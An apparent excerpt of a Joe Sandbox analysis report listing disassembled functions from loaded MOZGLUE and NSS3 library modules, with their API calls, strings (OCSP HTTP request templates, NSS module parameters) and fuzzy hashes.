Associated: 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445342116.000000006C6AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445370306.000000006C6B2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: af1de5071383da7d19f30f4205eff29266258c55d7641379cd617069b43a858a
Instruction ID: a482e3332545620f64770b8f41f548687a7b1ecb0ef67e8723d0bf889d59bf61
Opcode Fuzzy Hash: af1de5071383da7d19f30f4205eff29266258c55d7641379cd617069b43a858a
Instruction Fuzzy Hash: 26B1B471B083109BDB08DF6AD49465EB7F9FB8A700F14893DE899D7760D774A8018F8A

Function 6C63C930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 6C63C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C63C969
GetSystemInfo.KERNEL32(?), ref: 6C63C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C63C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C63C9E2

Memory Dump Source

Source File: 00000000.00000002.2445232982.000000006C621000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2445197773.000000006C620000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445342116.000000006C6AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445370306.000000006C6B2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 138643c86a4dc588f4570ef1aba1f0e467ab702a2e58b679bc0dd29ba0a7e124
Instruction ID: 205186cf9ada016e6872217ee8bd17534bf96fab921f73b325a400dcdfe8dca4
Opcode Fuzzy Hash: 138643c86a4dc588f4570ef1aba1f0e467ab702a2e58b679bc0dd29ba0a7e124
Instruction Fuzzy Hash: 0521FC317412387BDB15AA65ECC4BAE73B9BF8A744F511219F907A7A80DB706C00879D

Function 6C623060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C623095

Part of subcall function 6C6235A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6AF688,00001000), ref: 6C6235D5
Part of subcall function 6C6235A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6235E0
Part of subcall function 6C6235A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6235FD
Part of subcall function 6C6235A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C62363F
Part of subcall function 6C6235A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C62369F
Part of subcall function 6C6235A0: __aulldiv.LIBCMT ref: 6C6236E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C62309F

Part of subcall function 6C645B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6456EE,?,00000001), ref: 6C645B85
Part of subcall function 6C645B50: EnterCriticalSection.KERNEL32(6C6AF688,?,?,?,6C6456EE,?,00000001), ref: 6C645B90
Part of subcall function 6C645B50: LeaveCriticalSection.KERNEL32(6C6AF688,?,?,?,6C6456EE,?,00000001), ref: 6C645BD8
Part of subcall function 6C645B50: GetTickCount64.KERNEL32 ref: 6C645BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6230BE

Part of subcall function 6C6230F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C623127
Part of subcall function 6C6230F0: __aulldiv.LIBCMT ref: 6C623140

Part of subcall function 6C65AB2A: __onexit.LIBCMT ref: 6C65AB30

Memory Dump Source

Source File: 00000000.00000002.2445232982.000000006C621000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2445197773.000000006C620000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445298373.000000006C69D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445342116.000000006C6AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2445370306.000000006C6B2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 00c0fa70d37b4f2663b613acd3eb641b206e8bdd55143aab765ff8f8bfcdede3
Instruction ID: 31ef3f97cd2fc7ffdbe854b59787b562284fc3f2693e558828805f247fb41445
Opcode Fuzzy Hash: 00c0fa70d37b4f2663b613acd3eb641b206e8bdd55143aab765ff8f8bfcdede3
Instruction Fuzzy Hash: F6F0F962E2074896CB10DFB5A8D11EEB374AF6B114F546329E85463531FB2071E883DF

Non-executed Functions

Function 6C756E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8A2120,6C757E60), ref: 6C756EBC
TlsGetValue.KERNEL32 ref: 6C756EDF
EnterCriticalSection.KERNEL32(?), ref: 6C756EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C756F25

Part of subcall function 6C72A900: TlsGetValue.KERNEL32(00000000,?,6C8A14E4,?,6C6C4DD9), ref: 6C72A90F
Part of subcall function 6C72A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C72A94F

PR_Unlock.NSS3 ref: 6C756F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C756FA9
TlsGetValue.KERNEL32 ref: 6C7570B4
EnterCriticalSection.KERNEL32(?), ref: 6C7570C8
PR_CallOnce.NSS3(6C8A24C0,6C797590), ref: 6C757104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C757117
SECOID_Init.NSS3 ref: 6C757128
PORT_Alloc_Util.NSS3(00000057), ref: 6C75714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C75717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7571A9
PR_NotifyAllCondVar.NSS3 ref: 6C7571CF
PR_Unlock.NSS3 ref: 6C7571DD
free.MOZGLUE(?), ref: 6C7571EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C757208
free.MOZGLUE(00000000), ref: 6C757221
free.MOZGLUE(00000001), ref: 6C757235
TlsGetValue.KERNEL32 ref: 6C75724A
EnterCriticalSection.KERNEL32(?), ref: 6C75725E
PR_NotifyCondVar.NSS3 ref: 6C757273
PR_Unlock.NSS3 ref: 6C757281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C757291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7572B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7572D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7572E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C757301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C757310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C757335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C757344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C757363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C757372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C890148,,defaultModDB,internalKeySlot), ref: 6C7574CC
free.MOZGLUE(00000000), ref: 6C757513
free.MOZGLUE(00000000), ref: 6C75751B
free.MOZGLUE(00000000), ref: 6C757528
free.MOZGLUE(00000000), ref: 6C75753C
free.MOZGLUE(00000000), ref: 6C757550
free.MOZGLUE(00000000), ref: 6C757561
free.MOZGLUE(00000000), ref: 6C757572
free.MOZGLUE(00000000), ref: 6C757583
free.MOZGLUE(00000000), ref: 6C757594
free.MOZGLUE(00000000), ref: 6C7575A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7575BD
free.MOZGLUE(00000000), ref: 6C7575C8
free.MOZGLUE(00000000), ref: 6C7575F1
PR_NewLock.NSS3 ref: 6C757636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C757686
PR_NewLock.NSS3 ref: 6C7576A2

Part of subcall function 6C8098D0: calloc.MOZGLUE(00000001,00000084,6C730936,00000001,?,6C73102C), ref: 6C8098E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7576B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C757707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C75771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C757731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C75774A
DeleteCriticalSection.KERNEL32(?), ref: 6C757770
free.MOZGLUE(?), ref: 6C757779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7577AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7577C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7577DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C757821
PORT_Alloc_Util.NSS3(?), ref: 6C757837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C75785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C75786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C7578AC
free.MOZGLUE(00000000), ref: 6C7578BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C7578F3
free.MOZGLUE(00000000), ref: 6C7578FC
free.MOZGLUE(00000000), ref: 6C75791C

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Strings

NSS Internal Module, xrefs: 6C7574A2, 6C7574C6
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7574C7
Spac, xrefs: 6C757389
,defaultModDB,internalKeySlot, xrefs: 6C75748D, 6C7574AA
extern:, xrefs: 6C75772B
rdb:, xrefs: 6C757744
dll, xrefs: 6C75788E
sql:, xrefs: 6C7576FE
dbm:, xrefs: 6C757716
kbi., xrefs: 6C757886

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: 13a3ecd1cbc0e3e9e53008c5aa9ae10c18c366678b4d1978c333971fbf3c5aee
Instruction ID: cfb49616934c6f34259533043244b12e3854199c5218038d8576c74acd69668a
Opcode Fuzzy Hash: 13a3ecd1cbc0e3e9e53008c5aa9ae10c18c366678b4d1978c333971fbf3c5aee
Instruction Fuzzy Hash: 8C52F3B1E112059BEF218FA9DE0979E7BB4AF0530CF548438EC09A6B41EB71D964CBD1

Function 6C74EA80 Relevance: 109.2, APIs: 49, Strings: 13, Instructions: 735stringmemoryCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000), ref: 6C74EAB1

Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090AB
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C8090C9
Part of subcall function 6C809090: EnterCriticalSection.KERNEL32 ref: 6C8090E5
Part of subcall function 6C809090: TlsGetValue.KERNEL32 ref: 6C809116
Part of subcall function 6C809090: LeaveCriticalSection.KERNEL32 ref: 6C80913F

PR_ExitMonitor.NSS3 ref: 6C74EAC5

Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C80945B
Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C809479
Part of subcall function 6C809440: EnterCriticalSection.KERNEL32 ref: 6C809495
Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C8094E4
Part of subcall function 6C809440: TlsGetValue.KERNEL32 ref: 6C809532
Part of subcall function 6C809440: LeaveCriticalSection.KERNEL32 ref: 6C80955D

PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C74EBAF
PR_Socket.NSS3(00000002,00000001,00000000), ref: 6C74EBF8
PR_StringToNetAddr.NSS3(?,?), ref: 6C74EC20
PORT_Alloc_Util.NSS3(00000800), ref: 6C74EC39
PR_GetHostByName.NSS3(?,00000000,00000800,?), ref: 6C74EC5A
PR_EnumerateHostEnt.NSS3(00000000,?,?,?), ref: 6C74EC85
free.MOZGLUE(?), ref: 6C74ECB6
PR_SetError.NSS3(FFFFE078,00000000), ref: 6C74ECCF
free.MOZGLUE(?), ref: 6C74ED10
free.MOZGLUE(?), ref: 6C74ED26
PR_InitializeNetAddr.NSS3(00000000,?,?), ref: 6C74ED35
PR_snprintf.NSS3(?,00000010,:%d,?), ref: 6C74ED7F
PR_smprintf.NSS3(POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u,?,?,00000000,?), ref: 6C74EDAB
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C74EDBE
free.MOZGLUE(00000000), ref: 6C74EE9B
PR_smprintf.NSS3(GET %s HTTP/1.0Host: %s%s,?,?,00000000), ref: 6C74EEB1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C74EEC0
free.MOZGLUE(00000000), ref: 6C74EEE2
free.MOZGLUE(00000000), ref: 6C74EEF2
free.MOZGLUE(?), ref: 6C74EF15
free.MOZGLUE(?), ref: 6C74EF27
realloc.MOZGLUE(00000000,-00000401), ref: 6C74EF5C

Part of subcall function 6C74E910: PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C74E93B
Part of subcall function 6C74E910: PR_SetError.NSS3(FFFFE075,00000000), ref: 6C74E94E

strstr.VCRUNTIME140(-000000F8,), ref: 6C74F00C
strstr.VCRUNTIME140(00000000,6C89010D), ref: 6C74F03F
strchr.VCRUNTIME140(00000000,00000020), ref: 6C74F055
PL_strncasecmp.NSS3(00000000,HTTP/,00000005), ref: 6C74F06D
free.MOZGLUE(00000000), ref: 6C74F07A
PR_SetError.NSS3(FFFFE077,00000000), ref: 6C74F08A
strchr.VCRUNTIME140(?,00000020), ref: 6C74F0AC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,200), ref: 6C74F0C4
strchr.VCRUNTIME140(?,0000003A), ref: 6C74F0FA
strstr.VCRUNTIME140(-00000002,6C89010D), ref: 6C74F124
PL_strcasecmp.NSS3(?,content-type), ref: 6C74F13D
PL_strcasecmp.NSS3(?,content-length), ref: 6C74F14F
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 6C74F15F
PL_strcasecmp.NSS3(?,application/ocsp-response), ref: 6C74F1A0
memcpy.VCRUNTIME140(00000000,?), ref: 6C74F1CD
PR_SetError.NSS3(FFFFE077,00000000), ref: 6C74F231
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000), ref: 6C74F387
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C74F39C
free.MOZGLUE(00000000), ref: 6C74F3A5
free.MOZGLUE(00000000), ref: 6C74F3B1

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

Strings

POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u, xrefs: 6C74EDA6
:%d, xrefs: 6C74ED73
POST, xrefs: 6C74EB58, 6C74EB81
/G6/, xrefs: 6C74EA95
200, xrefs: 6C74F0BB
content-length, xrefs: 6C74F149
HTTP/, xrefs: 6C74F067
application/ocsp-request, xrefs: 6C74EE25
GET %s HTTP/1.0Host: %s%s, xrefs: 6C74EEAC
http, xrefs: 6C74EB86
application/ocsp-response, xrefs: 6C74F19A
content-type, xrefs: 6C74F137
GET, xrefs: 6C74EB53

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$Value$Error$CriticalSection$EnterL_strcasecmpstrchrstrstr$AddrHostL_strncasecmpLeaveMonitorR_smprintfUtilmemcpystrlen$AllocAlloc_EnumerateExitInitializeItem_ModuleNamePageR_snprintfSizeSocketStringatoireallocstrcmp
String ID: /G6/$200$:%d$GET$GET %s HTTP/1.0Host: %s%s$HTTP/$POST$POST %s HTTP/1.0Host: %s%sContent-Type: application/ocsp-requestContent-Length: %u$application/ocsp-request$application/ocsp-response$content-length$content-type$http
API String ID: 3957390022-989283906
Opcode ID: bd6940e7080d7db399fc69168d7664e9eff4f41144627e63e94e8bdd12046dbb
Instruction ID: 5449cb1bab2d57fc4f0d6244934e08385bd7177c148da47314cf92ddd404fcf0
Opcode Fuzzy Hash: bd6940e7080d7db399fc69168d7664e9eff4f41144627e63e94e8bdd12046dbb
Instruction Fuzzy Hash: 7A42D1B1604301AFEB10DF69DE85B5BB7E8AF85358F048838F94993751E735D908CB92

Function 6C74CA70 Relevance: 100.6, APIs: 56, Strings: 1, Instructions: 849threadtimememoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C74CB45
PORT_ZAlloc_Util.NSS3(00000040), ref: 6C74CB5B
CERT_GetConstrainedCertificateNames.NSS3(?,00000010,?), ref: 6C74CBEB
realloc.MOZGLUE(?,00000000), ref: 6C74CC3B
PR_SetError.NSS3(FFFFE029,00000000), ref: 6C74CD25
PR_GetCurrentThread.NSS3 ref: 6C74CD35
CERT_FindCertIssuer.NSS3(?,00000001,?,00000001), ref: 6C74CD74
CERT_CheckCertValidTimes.NSS3(?,00000001,?,00000000), ref: 6C74CD9D
PR_GetCurrentThread.NSS3 ref: 6C74CDBA
PR_SetError.NSS3(FFFFE01E,00000000), ref: 6C74CDD2
PR_GetCurrentThread.NSS3 ref: 6C74CDE9
PR_SetError.NSS3(FFFFE024,00000000), ref: 6C74CE7C
PR_GetCurrentThread.NSS3 ref: 6C74CE93
PR_SetError.NSS3(FFFFE025,00000000), ref: 6C74CEC1
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C74CF8F
memcmp.VCRUNTIME140(?,6C8696B4,00000048), ref: 6C74CFC8
PR_GetCurrentThread.NSS3 ref: 6C74D071
CERT_GetCertTrust.NSS3(?,?), ref: 6C74D091
PR_SetError.NSS3(FFFFE024,00000000), ref: 6C74D0C6
PR_GetCurrentThread.NSS3 ref: 6C74D0DD
PR_SetError.NSS3(FFFFE05A,00000000), ref: 6C74D116
PR_GetCurrentThread.NSS3 ref: 6C74D131
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D1D9
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D225
CERT_DestroyCertificate.NSS3(?), ref: 6C74D410
PR_SetError.NSS3(FFFFE0B6,00000000), ref: 6C74D44E
PR_GetCurrentThread.NSS3 ref: 6C74D45E
PR_GetCurrentThread.NSS3 ref: 6C74D1EC

Part of subcall function 6C74C9A0: PORT_ArenaAlloc_Util.NSS3(00000000,00000018,?,00000001,00000000,?,6C74D864,?,00000000,?), ref: 6C74C9AE

PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D285
PR_GetCurrentThread.NSS3 ref: 6C74D298
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D2D7
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D330
PR_GetCurrentThread.NSS3 ref: 6C74D34C
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C74D392
CERT_DestroyCertificate.NSS3(?), ref: 6C74D3BC
PR_SetError.NSS3(FFFFE00D,00000000), ref: 6C74D3DF
PR_GetCurrentThread.NSS3 ref: 6C74D3EE
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C74CE12

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_GetCurrentThread.NSS3 ref: 6C74CE22
PR_GetCurrentThread.NSS3 ref: 6C74CED8
memcmp.VCRUNTIME140(?,6C8696FC,00000048), ref: 6C74CFDC
CERT_GetCertTimes.NSS3(?,?,?), ref: 6C74CFF6
PR_GetCurrentThread.NSS3 ref: 6C74CDFD

Part of subcall function 6C809BF0: TlsGetValue.KERNEL32(?,?,?,6C850A75), ref: 6C809C07

PR_GetCurrentThread.NSS3 ref: 6C74CE52
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D4C4
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D4E2
PR_GetCurrentThread.NSS3 ref: 6C74D4EA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74D515
PR_SetError.NSS3(FFFFE014,00000000), ref: 6C74D52C
PR_GetCurrentThread.NSS3 ref: 6C74D540
free.MOZGLUE(?), ref: 6C74D567
CERT_DestroyCertificate.NSS3(00000000), ref: 6C74D575
CERT_DestroyCertificate.NSS3(?), ref: 6C74D584
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C74D592

Part of subcall function 6C7606A0: TlsGetValue.KERNEL32 ref: 6C7606C2
Part of subcall function 6C7606A0: EnterCriticalSection.KERNEL32(?), ref: 6C7606D6
Part of subcall function 6C7606A0: PR_Unlock.NSS3 ref: 6C7606EB

Strings

/G6/, xrefs: 6C74CA86

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CurrentErrorThread$CertificateDestroyUtil$Cert$Value$Alloc_Arena_Timesmemcmp$ArenaCheckConstrainedCriticalEnterEqual_FindFreeIssuerItemsNamesPublicSectionTrustUnlockValidfreerealloc
String ID: /G6/
API String ID: 3754541784-570549270
Opcode ID: 391505e4143f97f1d5a4c922550c38b0b268fc3848444e34ba38605d66e3dae1
Instruction ID: c284c299df42a115465c5b072f771819773bc2d614c6eed118b44583edaf2dfe
Opcode Fuzzy Hash: 391505e4143f97f1d5a4c922550c38b0b268fc3848444e34ba38605d66e3dae1
Instruction Fuzzy Hash: B3523671A08301ABE7109F59CE44B5BB7E5AF94318F14C93CF8A597B61EB31E809CB52

Function 6C7909B0 Relevance: 79.6, APIs: 44, Strings: 1, Instructions: 817memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C791AD3), ref: 6C7909D5
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,6C791AD3), ref: 6C7909E9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C790A18
PR_SetError.NSS3(00000000,00000000), ref: 6C790A30
memcpy.VCRUNTIME140(?,00000000,00000020,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C790CC9
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C790D05
EnterCriticalSection.KERNEL32(?), ref: 6C790D19
PR_Unlock.NSS3(?), ref: 6C790D36
free.MOZGLUE(?), ref: 6C790D75
TlsGetValue.KERNEL32 ref: 6C790DA1
EnterCriticalSection.KERNEL32(?), ref: 6C790DB5
PR_Unlock.NSS3(?), ref: 6C790DEB
PORT_Alloc_Util.NSS3(?), ref: 6C790DFF
PR_Unlock.NSS3(?), ref: 6C790E37
free.MOZGLUE(?), ref: 6C790E4E
PR_SetError.NSS3(00000000,00000000), ref: 6C790E6A
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C790E9A
TlsGetValue.KERNEL32 ref: 6C790F23
EnterCriticalSection.KERNEL32(?), ref: 6C790F37
PR_SetError.NSS3(00000000,00000000), ref: 6C790FC7

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

PR_Unlock.NSS3(?), ref: 6C790FDE
TlsGetValue.KERNEL32 ref: 6C790FFA
EnterCriticalSection.KERNEL32(?), ref: 6C79100E
PR_Unlock.NSS3(?), ref: 6C791050
PR_Unlock.NSS3(?), ref: 6C791073
TlsGetValue.KERNEL32 ref: 6C791087
